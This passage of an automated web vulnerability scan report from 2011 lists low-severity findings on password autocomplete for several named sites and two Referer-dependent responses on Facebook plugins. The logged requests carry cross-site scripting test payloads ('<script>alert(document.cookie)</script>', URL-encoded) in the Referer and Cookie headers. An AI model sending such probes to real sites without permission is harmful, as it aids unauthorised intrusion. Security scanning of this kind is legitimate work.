Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9JNGhyUDM0MzgwMDA4LzIyMjA4L2xp/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

11.133. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9NNGhyUDM0MzgwMDA5LzIyMjA5L2xp/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Vinson-&-Elkins-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...

11.134. http://www.veterinarycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.veterinarycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.135. http://www.volunteercrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109074

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.volunteercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.136. http://www.woothemes.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.woothemes.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Fri, 21 Jan 2011 19:37:28 GMT
Vary: Cookie
Expires: Fri, 21 Jan 2011 20:37:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: a9602306e2be29cba5c13f300262aee7
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div><form name="loginform" action="http://www.woothemes.com/wp-login.php" method="post"> <label for="userid" class="fl">
...[SNIP]...
</label> <input class="password fr" type="password" name="pwd" value="" id="password" size="10"/><div class="fix">
...[SNIP]...

11.137. http://www.workathomecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117680

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.workathomecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.138. http://www.writingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:54 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113096

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.writingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

12. Referer-dependent response
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kind of user-supplied data.



12.1. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/nm/us_bankofamerica;_ylt=AlohsBp579RpJ1eBqn0kxP.s0NUE;_ylu=X3oDMTNobm1hMzM5BGFzc2V0A25tLzIwMTEwMTIxL3VzX2JhbmtvZmFtZXJpY2EEY2NvZGUDbW9zdHBvcHVsYXIEY3BvcwMzBHBvcwMxMQRwdANob21lX2Nva2UEc2VjA3luX3RvcF9zdG9yeQRzbGsDYmFua29mYW1lcmlj
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 18:22:05 GMT
Content-Length: 8036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d39cecde04f99075564628" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall"><input title="Remove" type="button" /></label></div></td><td><div class="summary_text">10K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">10K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"7546b011",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:334488,vip:"66.220.146.32",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"N9lIZ",lhsh:"28366",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/yU\/r\/jKqmG9e3p5H.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yL\/r\/0iTqcR_XEYF.css"},"wDcHm":{"type":"css","permanent":1,"src":"http
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 18:23:17 GMT
Content-Length: 7782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d39cf156e5e62853096200" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall"><input title="Remove" type="button" /></label></div></td><td><div class="summary_text">10K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">10K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"1ed77037",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:334488,vip:"66.220.146.32",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"N9lIZ",lhsh:"28366",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/yU\/r\/jKqmG9e3p5H.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yL\/r\/0iTqcR_XEYF.css"},"wDcHm":{"type":"css","permanent":1,"src":"http
...[SNIP]...

12.2. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.jd2b.com/?f05bd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf651820abc=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; wd=308x80

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 22:19:18 GMT
Content-Length: 13490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="jd2b.com" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_1" value="http://www.jd2b.com/?f05bd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf651820abc=1" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge"><input value="Sign Up" type="submit" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u835849_1&quot;).login();"><b>log in</b></a> to see what your friends like.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&amp;partner_id=jd2b.com&amp;placement=like_box&amp;extra_1=http%3A%2F%2Fwww.jd2b.com%2F%3Ff05bd%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ecf651820abc%3D1&amp;extra_2=US" /></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><span class="name">JD2B</span></a></div><div><div id="connect_widget_4d3a0666772b32878833507" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary 
connect_text_wrapper"><span class="connect_widg
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; wd=308x80

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 22:20:19 GMT
Content-Length: 13075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
